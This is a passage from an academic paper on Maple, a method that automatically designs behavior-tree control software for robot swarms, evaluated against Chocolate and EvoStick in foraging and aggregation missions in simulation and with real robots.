and the nest is represented by the white area (see Fig. 2). The two black circles have a radius of 0.15, they are separated by a distance of 1.2, and are located at 0.45 from the white area. A light source is placed behind the white area to indicate the position of the nest to the robots. The goal of the swarm is to retrieve as many items as possible from the sources to the nest. In other words, the robots must go back and forth between the black circles and Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 11/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ the white area as many times as possible. The objective function is FF = I where I is the number of items deposited in the nest. AGGREGATION The swarm must select and aggregate in one of the two black areas (see Fig. 3). The two black areas have a radius of 0.3 and are separated by a distance of 0.4. The objective function is FA = max(Nl, Nr)/N, where Nl and Nr are the number of robots located on the Figure 2 FORAGING. (A) Simulated arena. (B) Real arena. The red glow visible in the picture is due to a red gel we placed in front of the light source. With the red gel, the light does not disturb the overhead camera that is used to track the position of the robots and compute the objective function. Yet, the light is still perceived by the robots that use their infrared sensors to sense it. Full-size DOI: 10.7717/peerj-cs.314/fig-2 Figure 3 AGGREGATION. The objective function FA is computed as the maximal fraction of robots situated either on the left area (Nl/N) or on the right area (Nr/N). It is evaluated at the end of an experimental run. (A) Simulated arena, with FA = 0.1 as 2 robots stand on the left black area (Nl = 2) and no robot stands on the right one (Nr = 0). (B) Real arena, with FA = 0.65 as Nl = 5 and Nr = 13. Full-size DOI: 10.7717/peerj-cs.314/fig-3 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 12/27 http://dx.doi.org/10.7717/peerj-cs.314/fig-2 http://dx.doi.org/10.7717/peerj-cs.314/fig-3 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ left and right black area, respectively; and N is the total number of robot in the swarm. The objective function is computed at the end of a run and is maximized when all the robots have aggregated in the same black area. Dummy control software Throughout the three studies, we compare the performance of automatically generated control software to the one of two instances of control software—one per mission—that we call “dummy” control software. They perform a simple, naive, and trivial behavior that we can consider as a baseline for each mission. With this comparison, we assess whether the automatic design methods can produce behaviors that are more sophisticated than trivial solutions. To produce the two instances of dummy control software, we used the same low-level behaviors and conditions that Maple and Chocolate have at their disposal to generate control software. For FORAGING, we consider a strategy in which the robots move randomly in the environment. We obtained this strategy by using the low-level behavior exploration. For AGGREGATION, we consider a strategy in which the robots explore the environment randomly, and stop when they encounter a black spot. We obtained this strategy by combining the modules exploration, black-floor, and stop. To fine-tune the parameters of the modules, we used Iterated F-race with a design budget of 1k simulation runs. Methodology To account for the stochasticity of the design process, we execute each design method several times, and therefore produce several instances of control software. The number of executions of the design methods varies with the study. To evaluate the performance of a design method, each instance of control software is executed once in simulation. In Study 1, each instance of control software is also executed once in reality. Simulations are performed with ARGoS3, version beta 48 (Pinciroli et al., 2012; Garattoni et al., 2015). In the experiments with the robots, we use a tracking system comprising an overhead camera and QR-code tags on the robots to identify and track them in real time (Stranieri et al., 2013). With this tracking system, we automatically measure the performance of the swarm, and we automatically guide the robots to the initial position and orientation for each evaluation run. During an evaluation run, the robots may tip over due to collisions. To avoid damages, we intervene to put them upright. In the three studies, we present the performance of the design methods in the form of box-and-whiskers boxplots. In addition, we present the median performance of the dummy control software assessed in simulation with a dotted horizontal line. In each study, statements such as “method A is significantly better/worse than B” imply that significance has been assessed via a Wilcoxon rank-sum test, with confidence of at least 95%. The instances of control software produced, the experimental data collected in simulation and in reality, and videos of the behavior displayed by the swarm of physical robots are available online as Supplemental Material (Ligot et al., 2020). Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 13/27 http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ STUDY 1: PERFORMANCE IN SIMULATION AND REALITY In this section, we evaluate Maple’s ability to produce control software that crosses the reality gap satisfactorily. To do so, we compare the performance of control software generated by three design methods—Maple, Chocolate and EvoStick—both in simulation and in reality. Previous research (Francesca et al., 2015) indicates that Chocolate crosses the reality gap more satisfactorily than EvoStick. Francesca et al. (2014, 2015) argue that Chocolate’s ability to cross the reality gap is mainly due to its modular nature. Because Maple shares with Chocolate the same modular nature and differs from it only in the control architecture adopted, we expect Maple to also experience smaller performance drops than EvoStick. We executed each design method 10 times, and thus produced 10 instances of control software. The design budget allocated to each method is 50k simulation runs. The results are depicted in Fig. 4. FORAGING In simulation, the performance of the control software produced by the three automatic design methods is similar, and is significantly better than the one of the dummy strategy. In reality, EvoStick is significantly worse than Maple and Chocolate. The performance of all three methods drops significantly when passing from simulation to reality, but EvoStick suffers from the effects of the reality gap the most. See Fig. 4A. Most of the instances of control software generated by Maple and Chocolate display similar strategies: the robots explore the environment randomly and once a black area (that is, a source of food) is found, they navigate towards the light to go back to the white A Maple EvoStickChocolate 0 10 20 30 40 P er fo rm an ce B Maple EvoStickChocolate 0.0 0.2 0.4 0.6 0.8 1.0 Figure 4 Results of Study 1. The gray boxes represent the performance assessed in simulation; the white boxes the one assessed in reality. The dotted line represents the median performance of the dummy control software assessed in simulation. Full-size DOI: 10.7717/peerj-cs.314/fig-4 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 14/27 http://dx.doi.org/10.7717/peerj-cs.314/fig-4 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ area (that is, the nest). One instance of control software produced by Maple uses the anti-phototaxis low-level behavior to leave the nest faster once an item has been dropped. Three instances of control software produced by Chocolate display an even more sophisticated strategy: the robots only explore the gray area in the search for the sources of food. In other words, the robots always directly leave the nest if they enter it, independently of whether they dropped an item or not. In simulation, the instances of control software generated by EvoStick display drastically different behaviors than the ones produced by Maple and Chocolate: the robots navigate following circular trajectories that cross at least one food source and the nest. In reality, the robots follow circular trajectories that are much smaller than those displayed in simulation. As a result, the robots tend to cluster near the light. Contrarily to Maple and Chocolate, and with the exception of few cases, the instances of control software generated by EvoStick do not display an effective foraging behavior. AGGREGATION In simulation, EvoStick performs significantly better than Maple and Chocolate, which show similar performance. In reality, we observe an inversion of the ranks: Maple and Chocolate perform significantly better than EvoStick. Indeed, the performance of EvoStick drops considerably, whereas the performance drop experienced by Maple and Chocolate is smaller. See Fig. 4B. The instances of control software produced by Maple and Chocolate efficiently search the arena and make the robots stop on the black areas once they are found. In simulation, with the control software produced by EvoStick, the robots follow the border of the arena and then adjust their trajectory to converge towards neighboring peers that are already situated on a black spot. In reality, the control software generated by EvoStick does not display the same behavior: robots are unable to find the black areas as efficiently as in simulation because they tend to stay close to the borders of the arena. Moreover, the robots tend to leave the black areas quickly when they are found. Although the three design methods perform significantly better than the dummy control software in simulation, none of the methods produced control software that makes the physical robots reach a consensus on the black area on which they should aggregate. STUDY 2: PERFORMANCE VERSUS DESIGN BUDGET In this section, we investigate the performance of Maple and Chocolate across different design budgets. Because the search space (that is, all instances of control software that can be generated) of Chocolate is significantly larger than the one of Maple—O jBj4jCj16 � � and O jBj4jCj4 � � , respectively (Kuckling et al., 2018b)—we expect Maple to converge to high performing solutions faster than Chocolate. We consider 6 design budgets: 0.5k, 1k, 5k, 10k, 50k and 200k simulation runs. For each design budget, we executed each design method 20 times, and thus produced 20 instances of control software. In total, the two design methods have been executed 120 times each. The results are depicted in Fig. 5. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 15/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ FORAGING The performance of the methods show different trends when the design budget increases. For Maple, there is a significant improvement of the performance between design budgets of 1k and 5k, and between 50k and 200k simulation runs. For Chocolate, the performance increases significantly between design budgets of 5k and 10k, 10k and 50k, and 50k and 200k simulation runs. See Fig. 5A. With very small design budgets—0.5k and 1k simulation runs—Maple and Chocolate show similar performance: they are unable to find solutions that are better than the dummy control software. With a small design budget—5k simulation runs—Maple performs significantly better than Chocolate. Also, with 5k simulation runs, Chocolate and the dummy control software show similar performance. With a large design budget— 200k runs— Chocolate performs significantly better than Maple. Indeed, the instances of control software generated by Chocolate display a more sophisticated foraging strategy than those generated by Maple: to increase the rate of discovery of the food sources, the robots only explore the gray area of the arena, and stay away from the nest. It appears that, with Maple’s restrictions on the structure of the behavior trees, this strategy cannot be produced. Indeed, in the instances of control software that can be produced by Maple, only one condition can terminate the execution of the action performed, whereas in the ones produces by Chocolate, up to four conditions can. Therefore, with Maple, the robots are forced to explore the whole arena until they find the food sources (that is, the black circles). However, it is important to notice that the behavior trees generated by Maple with A .5k 10k 200k1k 5k 50k 0 10 20 30 40 50 P er fo rm an ce Design budgets (simulation runs) B .5k 10k 200k1k 5k 50k 0.0 0.2 0.4 0.6 0.8 1.0 Design budgets (simulation runs) Figure 5 Results of Study 2. Performance of Maple and Chocolate over multiple design budgets, expressed in number of simulation runs. Light gray boxes represent the performance of Maple, dark gray boxes the one of Chocolate. The dotted line represents the median performance of the dummy control software. Full-size DOI: 10.7717/peerj-cs.314/fig-5 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 16/27 http://dx.doi.org/10.7717/peerj-cs.314/fig-5 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ a design budget of 5k simulation runs are only outperformed by probabilistic finite-state machines when 200k simulation runs are allocated to Chocolate. AGGREGATION The performance of the control software generated by both methods increase almost constantly with the design budget. Also for this mission, Chocolate requires a design budget of at least 10k simulation runs in order to generate control software that is significantly better than the dummy control software. Contrarily, Maple only requires 1k simulation runs. With 1k and 5k simulation runs, Maple outperforms Chocolate. For larger design budgets, Maple and Chocolate show similar performance. See Fig. 5B. Although the design budgets considered allow the two methods to outperform the dummy control software in multiple occasions, neither of them generated control software that completed the mission satisfactorily. Indeed, the maximal median performance obtained is FA ¼ 0:65, which means that only 13 out of the 20 robots were on the same black spot. STUDY 3: MAPLE AND SOME OF ITS POSSIBLE VARIANTS In this section, we explore the changes in performance when variations to the control architecture of Maple are introduced. Our exploration is not exhaustive: we only consider variants that generate behavior trees whose structure is similar to the one of the behavior trees generated by Maple. We limit our exploration to variants that generate trees with: (i) 3 levels (top-level, inner, and leaf nodes); up to 4 branches connected to the top-level node; and exactly 2 leaf nodes per branch. Many variants are possible, however, because the action nodes of Maple can only return running, some variants are unable to combine low-level behaviors into meaningful and elaborate individual behaviors. Descriptions of these variants, as well as illustrations, are given as part of Supplemental Material (Ligot et al., 2020). In the following, we describe variants that are promising and explain how they behave with the modules considered in Maple. We tested the most promising variants by generating control software and evaluating their performance in simulation, and report the results. Alternative behavior tree structures ICFN (inverted control-flow nodes): The control-flow nodes are inverted with regard to the ones of Maple: the top-level node is a selector� and the inner nodes are sequence nodes. See Fig. 6A. In this variant, the action node of a subtree is executed as long as the condition returns success, whereas it is executed until the condition returns success in Maple. ND (negation decorator): A negation decorator node can be instantiated above a condition node. See Fig. 6B. The negation decorator returns failure (success) if the condition returns success (failure). With the set of conditions available, it is particularly interesting to place a negation decorator above a condition on the color of the ground perceived (that is black-, gray-, or white-floor). Indeed, placing a negation decorator node above a neighbor-count condition is equivalent to having an inverted-neighbor-count condition, and vice versa. Similarly, a negation decorator above a fixed-probability Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 17/27 http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ condition with ρ is equivalent to a fixed-probability with 1 − ρ. However, a negation decorator above a condition on a given color is equivalent to assessing the conditions for the two other colors simultaneously. FL (free leaves): Each leaf node is to be chosen between condition and action nodes. See Fig. 6C. Four pairs of leaf nodes are possible: condition–condition (see first branch), condition–action (which corresponds to the leaf pair imposed in Maple, see second branch), action–condition (see third branch), and action–action (see fourth branch). For each subtree, the optimization algorithm is free to chose any pair of leaf nodes. The variant can express disjunction of conditions: a branch following a condition– condition leaf pair is ticked if the first or the second condition is met. However, the variant introduces dead-end states: when an action on the left hand side of a leaf pair is ticked, the action is executed for the remaining of the simulation run. CA|CC (condition–action or condition–condition): The right-hand side leaf node can be a condition or an action node. Two pairs of leaf nodes are thus possible: condition–action, condition–condition. With respect to FL, this variant can also express disjunction of conditions, but does not allow for dead-end states. ?∗ → C1 A1 → C2 A2 A →∗ ? δ C1 A1 ? C2 A2 B →∗ ? C1 C2 ? C3 A1 ? A2 C4 ? A3 A4 C Figure 6 A few examples of Maple’s variants. (A) variant ICFN (inverted control flow nodes), (B) variant ND (negation decorator), (C) variant FL (free leaves). The number of branches connected to the top-level node, and their order, has been chosen arbitrarily. Full-size DOI: 10.7717/peerj-cs.314/fig-6 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 18/27 http://dx.doi.org/10.7717/peerj-cs.314/fig-6 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ SP (success probability): Each action node has a probability ρ to return success. The probability ρ is a real value in the range 0; 1½ � and is tuned by the optimization process. With this probability, we simulate the capability of the action nodes to assess if the low-level behaviors are successfully executed. RESULTS For each variant, we produced 20 instances of control software, all generated by the same optimization process—Iterated F-race—with a design budget of 50k simulation runs. We compare the performance of the variants to the one of Maple. FORAGING None of the variants outperformed Maple. Maple, ND, and CA|CC perform similarly; moreover, they outperform ICFN, FL, SP, and the dummy control software. The variants ICFN, FL, and the dummy control software show similar performance. See Fig. 7A. All the instances of control software generated by Maple show similar behaviors: the robots explore the arena until they find one of the food sources, then navigate towards the nest using the light as a guidance. In some cases, the robots use the anti-phototaxis low-level behavior to directly leave the nest once they have deposited an item. With variant ND, we can manually design control software that displays an elaborate strategy: the robots increase the rate at which they discover food sources by only exploring the gray area of the arena. This behavior cannot be expressed by Maple (see Study 2). An example of a behavior tree adopting variant ND that displays this strategy is illustrated in Section 5 of the Supplemental Material (Ligot et al., 2020). In this example, the elaborate A Maple FL SPICFN ND CA|CC P er fo rm an ce 0 10 20 30 40 B Maple FL SPICFN ND CA|CC 0.0 0.2 0.4 0.6 0.8 1.0 Figure 7 Results of Study 3. Performance in simulation of different variants of Maple. The dotted line represents the median performance of the dummy control software. Full-size DOI: 10.7717/peerj-cs.314/fig-7 Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 19/27 http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314/fig-7 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ strategy only emerges if the success probability of the condition node below the negation decorator is set to 1. Indeed, if the success probability is slightly lower, the behavior displayed is radically different, and more importantly, inefficient. It appears that, with the allocated budget, this necessary condition makes it unlikely for Iterated F-race to produce this strategy. Iterated F-race was not able to take advantage of the disjunction of conditions that is available in CA|CC to find better solutions that those of Maple. Indeed, we are unable to do so ourself. However, the increased search space of CA|CC does not hinder the optimization process as results obtained are similar to those of Maple. In variant SP, the success probabilities, together with the conditions, are termination mechanisms for the subtrees. The additional termination mechanisms makes it harder for Iterated F-race to exploit correlations between conditions and actions that lead to behaviors as efficient as those generated by Maple. Most of the produced control software rely essentially on the exploration low-level behavior. With variant ICFN, one can generate a behavior tree that expresses the same elaborate strategies that can be generated with variant ND (see Section 5 of the Supplemental Material (Ligot et al., 2020) for an example). However, ICFN is faced with a similar problem as ND: the success probability of the conditions needs to be set to 1 in order for that elaborate strategy to emerge. With a success probability set to a lower value, the condition node might return failure even though its condition is met, and the subtree might therefore terminate prematurely. The allocated design budget was not large enough for Iterated F- race to find behavior trees with meaningful connections between the conditions and behaviors, which resulted in poor performance. The performance of the variant FL shows the highest variance. Sometimes, the behavior trees generated are similar to those produced by Maple. However, in many cases, the left leaf node of subtrees is an action node with an associated exploration low-level behavior. Once this node is reached, this low-level behavior is executed until the end of the experimental run. As a result, the performance observed is similar to the one of the dummy control software. AGGREGATION Variant ICFN outperforms Maple. Maple, FL, ND, and SP show similar performance. Maple outperforms CA|CC. Every variant produced behavior trees that outperform the dummy control software. See Fig. 7B. All the instances of control software generated by Maple and the different variants make use of exploration and attraction as low-level behaviors to efficiently search for black spots. Maple and FL use stop as a low-level behavior in order to keep the robots on the discovered spot. Contrarily, the majority of the behavior trees adopting variant ICFN, ND, SP, and CA|CC do not contain the stop low-level behaviors as action nodes. Instead, they take advantage of the fact that, when no action node is executed, the robot stands still. ICFN is the only variant for which Iterated F-race was able to exploit this feature to outperform Maple. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 20/27 http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ RELATED WORK Originating from game development (Isla, 2005), behavior trees have found recent applications in artificial intelligence (Perez et al., 2011) and robotics. Most of the robotics research focuses on their use in manipulators. Bagnell et al. (2012) used behavior trees to control a manipulator to perform simple manipulation tasks. Hu et al. (2015) used them to control the Raven-II surgical robot to perform an abstract version of tumor ablation surgery. Behavior trees have also been used as a control software for mobile robotics systems. Marzinotto et al. (2014) designed a behavior tree to make a NAO robot move towards a table and grasp an object. In all of the presented studies, behavior trees have been manually designed. To the best of our knowledge, the work of Jones et al. (2018) is the first and only application of behavior trees in the context of automatic off-line design of robot swarms2, 3. The authors proposed a method based on genetic programing that automatically generates control software for a swarm of Kilobots in the form of behavior trees. The method has been tested on a foraging task in simulation and in reality. Their results suggest that behavior trees can be used as a control architecture in swarm robotics. Besides the different optimization processes adopted in the method of Jones et al. (2018) and in Maple, another major difference between the two methods lies in the action nodes used. In the method proposed by Jones et al. (2018), low-level behaviors are atomic commands: for example, move forward, turn left/right, or store data. Contrarily, the low-level behaviors that can be combined by Maple are more complex actions. Regardless of this difference, the low-level behaviors of the two methods lack natural success or failure termination criteria. To use their atomic low-level behaviors as action nodes in behavior trees, Jones et al. (2018) programed the action nodes such that they return success after the second execution of the behavior, but failure is never returned. This solution allowed their method to have no restrictions on the selection of the control-flow nodes. In Maple, the action nodes can only return running, but the structure of the behavior trees, and the control-flow nodes, are restricted such that an external condition terminates the execution of an action. CONCLUSIONS In this article, we presented Maple: an automatic modular design method that generates control software for robot swarms in the form of behavior trees. Maple is part of the AutoMoDe family: it generates control software by selecting, combining, and fine-tuning a set of predefined modules. Previous instances of AutoMoDe have all used probabilistic finite-state machines as a control architecture. In comparison to finite-state machines, behavior trees offer a number of appealing features. However, most of these features only emerge if the action nodes return their states of execution, that is, if the robot is able to tell whether the low-level behavior it executes is terminated successfully, could not execute normally, or still requires time to terminate. In the context of swarm robotics, the simple and reactive robots typically used are not able to determine the state of execution of the low-level behaviors they operate. With Maple, we have investigated the use of behavior trees as a control architecture in the automatic modular design for robot swarms, and have shown that they can still be used even if the low-level behaviors they combine do not 2 The authors also adapted their system for the onboard evolution of a swarm of nine Xpucks (Jones et al., 2019). 3 Neupane & Goodrich (2019) proposed a method based on the grammatical evolution of behavior trees for robot swarms, but their experiments were conducted in simulation only and the focus of the paper is mainly ported on the evolutionary approach rather than on behavior trees. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 21/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ return success nor failure. It is our contention that, despite their potential is not exploited in the context of the automatic modular design of robot swarms, behavior trees are a control architecture that is worth exploring. In particular, we reckon that the inherent modularity they offer could be exploited by future automatic modular design methods. In fact, behavior trees can be easily manipulated without compromising their structural integrity, which allows for the use of tailored optimization algorithms based on local manipulations. We devised Maple to be as similar as possible to Chocolate: the two methods share the same optimization algorithm, the same set of predefined modules, and generate control software on the basis of the same reference model. The only difference between Maple and Chocolate is the control architecture adopted. We conducted three studies based on two missions: FORAGING and AGGREGATION to assess the implications of adopting behavior trees as a control architecture. In the first study, we assessed Maple’s ability to cross the reality gap satisfactorily by comparing its performance in simulation and in reality against Chocolate and EvoStick, an evolutionary swarm robotics method. In the second study, we investigated the effect of the design budget on Maple and Chocolate. In the third study, we explored different variants of Maple’s control architecture. Our main findings are the following. (A) The results show that Maple is robust to the reality gap. Indeed, Maple and Chocolate performed similarly, and they suffered from a reduced performance drop with respect to EvoStick. These results confirm Francesca et al. (2014) conjecture that AutoMoDe is robust to the reality gap due to its modular nature. They also indicate that the architecture into which the predefined modules are combined is a secondary issue. (B) The study on the effect of the design budget has shown that: (i) the restrictions on the structure of Maple’s behavior trees inhibit its expressiveness, indeed, for FORAGING, Maple is unable to express some efficient solution that Chocolate could generate; (ii) Maple converges to efficient solutions faster than Chocolate because of the smaller search space. The restrictions of Maple, imposed by the absence of natural termination criteria in the low-level behaviors adopted, appear to be a double-edged sword: they facilitate the initial search for efficient solutions, but curb the expressiveness of behavior trees. When adopting the low-level behaviors of Chocolate, none of the variants considered outperformed Maple in both missions. Overall, our three studies indicate that behavior trees can be used in the particular context of swarm robotics in which low-level behaviors typically do not have a natural termination criterion. However, they also suggest that behavior trees only offer a benefit over probabilistic finite state machines when the design budget is small. Future work could develop along two avenues. The first one could be dedicated to further investigate the use of Vanilla’s and Chocolate’s low-level behaviors as action nodes of behavior trees. For example, the control software generated by Maple with different design budgets could be assessed in robot experiments. The same holds for control software generated by Maple’s variants. Also, further variants could be explored by relaxing the restrictions on the number of levels, branches, and leaves. For the relevant ones, the effect of the design budget could be investigated. As a second avenue, future work could be devoted to developing an ad-hoc optimization algorithm that takes advantage Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 22/27 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ of the inherent modularity of behavior trees. Local search algorithms, such as iterative improvement and simulated annealing, have shown to be promising algorithms for the automatic modular design of swarm behaviors (Kuckling, Ubeda Arriaza & Birattari, 2019; Kuckling, Stützle & Birattari, 2020) and could serve as starting points. ADDITIONAL INFORMATION AND DECLARATIONS Funding The project has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation program (grant agreement No. 681872). Mauro Birattari and Jonas Kuckling received support from the Belgian Fonds de la Recherche Scientifique—FNRS. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: The project has received funding from the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation program (grant agreement No 681872). Mauro Birattari and Jonas Kuckling received support from the Belgian Fonds de la Recherche Scientifique—FNRS. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Competing Interests Mauro Birattari is an Academic Editor for PeerJ. Author Contributions � Antoine Ligot conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Jonas Kuckling conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Darko Bozhinoski conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � Mauro Birattari conceived and designed the experiments, authored or reviewed drafts of the paper, directed the research, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and code are available in the Supplemental Files and at IRIDIA: http://iridia.ulb.ac.be/supp/IridiaSupp2020-009/index.html. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.314#supplemental-information. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 23/27 http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://iridia.ulb.ac.be/supp/IridiaSupp2020-009/index.html http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314#supplemental-information http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ REFERENCES Bagnell JA, Cavalcanti F, Cui L, Galluzzo T, Hebert M, Kazemi M, Klingensmith M, Libby J, Liu TY, Pollard N, Pivtoraiko M, Valois J-S, Zhu R. 2012. An integrated system for autonomous robotics manipulation. In: IEEE/RSJ International Conference on Intelligent Robots and Systems, IROS, Piscataway: IEEE, 2955–2962. Balaprakash P, Birattari M, Stützle T. 2007. Improvement strategies for the F-Race algorithm: sampling design and iterative refinement. In: Bartz-Beielstein T, Blesa MJ, Blum C, Naujoks B, Roli A, Rudolph G, Sampels M, eds. Hybrid Metaheuristics, 4th International Workshop, HM 2007. Vol. 4771. Berlin: Springer, 108–122. Beni G. 2004. From swarm intelligence to swarm robotics. In: Şahin E, Spears WM, eds. Swarm Robotics, SAB. Vol. 3342. Berlin: Springer, 1–9. Birattari M, Ligot A, Bozhinoski D, Brambilla M, Francesca G, Garattoni L, Garzón Ramos D, Hasselmann K, Kegeleirs M, Kuckling J, Pagnozzi F, Roli A, Salman M, Stützle T. 2019. Automatic off-line design of robot swarms: a manifesto. Frontiers in Robotics and AI 6:59 DOI 10.3389/frobt.2019.00059. Birattari M, Ligot A, Hasselmann K. 2020. Disentangling automatic and semi-automatic approaches to the optimization-based design of control software for robot swarms. Nature Machine Intelligence 2(9):494–499 DOI 10.1038/s42256-020-0215-0. Bozhinoski D, Birattari M. 2018. Designing control software for robot swarms: software engineering for the development of automatic design methods. In: Proceedings of the 1st International Workshop on Robotics Software Engineering, RoSE, New York: ACM, 33–35. Brambilla M, Ferrante E, Birattari M, Dorigo M. 2013. Swarm robotics: a review from the swarm engineering perspective. Swarm Intelligence 7(1):1–41 DOI 10.1007/s11721-012-0075-2. Brooks RA. 1986. A robust layered control system for a mobile robot. IEEE Journal on Robotics and Automation 2(1):14–23 DOI 10.1109/JRA.1986.1087032. Brooks RA. 1991. Intelligence without representation. Artificial Intelligence 47(1–3):139–159 DOI 10.1016/0004-3702(91)90053-M. Brooks RA. 1992. Artificial life and real robots. In: Varela FJ, Bourgine P, eds. Towards a Practice of Autonomous Systems. Proceedings of the First European Conference on Artificial Life. Cambridge: MIT Press, 3–10. Bäck T, Fogel DB, Michalewicz Z. 1997. Handbook of evolutionary computation. First. Bristol: IOP Publishing Ltd. Champandard AJ. 2007. Understanding behavior trees. Available at http://aigamedev.com/open/ articles/bt-overview/. Champandard AJ, Dawe M, Hernandez-Cerpa D. 2010. Behavior trees: three ways of cultivating game AI. Game Developers Conference, AI Summit. Available at https://www.gdcvault.com/ play/1012744/Behavior-Trees-Three-Ways-of. Christensen AL, Dorigo M. 2006. Evolving an integrated phototaxis and hole-avoidance behavior for a swarm-bot. In: Rocha LM, Yaeger LS, Bedau MA, Floreano D, Goldstone RL, Vespignani A, eds. Artificial Life X: Proceedings of the Tenth International Conference on the Simulation and Synthesis of Living Systems. Cambridge: MIT Press. A Bradford Book, 248–254. Colledanchise M, Ögren P. 2018. Behavior Trees in Robotics and AI: An Introduction. First Edition. Boca Raton: CRC Press. Conover WJ. 1999. Practical Nonparametric Statistics. Third Edition. New York: John Wiley & Sons. Dorigo M, Birattari M, Brambilla M. 2014. Swarm robotics. Scholarpedia 9(1):1463 DOI 10.4249/scholarpedia.1463. Ligot et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.314 24/27 http://dx.doi.org/10.3389/frobt.2019.00059 http://dx.doi.org/10.1038/s42256-020-0215-0 http://dx.doi.org/10.1007/s11721-012-0075-2 http://dx.doi.org/10.1109/JRA.1986.1087032 http://dx.doi.org/10.1016/0004-3702(91)90053-M http://aigamedev.com/open/articles/bt-overview/ http://aigamedev.com/open/articles/bt-overview/ https://www.gdcvault.com/play/1012744/Behavior-Trees-Three-Ways-of https://www.gdcvault.com/play/1012744/Behavior-Trees-Three-Ways-of http://dx.doi.org/10.4249/scholarpedia.1463 http://dx.doi.org/10.7717/peerj-cs.314 https://peerj.com/computer-science/ Floreano D, Husbands P, Nolfi S. 2008. Evolutionary robotics. First. Berlin, Heidelberg: Springer Handbook of Robotics, Springer Handbooks, 1423–1451. Francesca G, Birattari M. 2016. Automatic design of robot swarms: achievements and challenges. Frontiers in Robotics and AI 3(29):1–9 DOI 10.3389/frobt.2016.00029. Francesca G, Brambilla M, Brutschy A, Garattoni L, Miletitch R, Podevijn G, Reina A, Soleymani T, Salvaro M, Pinciroli C, Mascia F, Trianni V, Birattari M. 2015. AutoMoDe-Chocolate: automatic design of control software for robot swarms. Swarm Intelligence 9(2–3):125–152 DOI 10.1007/s11721-015-0107-9. Francesca G, Brambilla M, Brutschy A, Trianni V, Birattari M. 2014. AutoMoDe: a novel approach to the automatic design of control software for robot swarms. Swarm Intelligence 8(2):89–112 DOI 10.1007/s11721-014-0092-4. Friedman M. 1937. The use of ranks to avoid the assumption of normality implicit in the analysis of variance. Journal of the American Statistical Association 32(200):675–701 DOI 10.1080/01621459.1937.10503522. Friedman M. 1939. A correction: the use of ranks to avoid the assumption of normality implicit in the analysis of variance. Journal of the American Statistical Association 34(205):109. Garattoni L, Birattari M. 2016. Swarm robotics. In: Webster JG, ed. Wiley Encyclopedia of Electrical and Electronics Engineering. Hoboken: John Wiley & Sons, 1–19. Garattoni L, Francesca G, Brutschy A, Pinciroli C, Birattari M. 2015. Software infrastructure for e-puck (and TAM). Technical Report TR/IRIDIA/2015-004, IRIDIA, Université libre de Bruxelles, Belgium. Available at http://iridia.ulb.ac.be/IridiaTrSeries/link/IridiaTr2015-004.pdf. Garzón Ramos D, Birattari M. 2020. Automatic design of collective behaviors for robots that can display and perceive colors. Applied Sciences 10(13):4654 DOI 10.3390/app10134654. Geman S, Bienenstock E, Doursat R. 1992. Neural networks and the bias/variance dilemma. Neural Computation 4(1):1–58 DOI 10.1162/neco.1992.4.1.1. Gutiérrez Á, Campo A, Dorigo M, Donate J, Monasterio-Huelin F, Magdalena L. 2009. Open e- puck range & bearing miniaturized board for local communication in swarm robotics. In: Kosuge K, ed. IEEE International Conference on Robotics and Automation, ICRA. Piscataway: IEEE, 3111–3116. Hasselmann K, Ligot A, Francesca G, Birattari M. 2018. Reference models for AutoMoDe. Technical Report TR/IRIDIA/2018-002, IRIDIA, Université libre de Bruxelles, Belgium. Available at 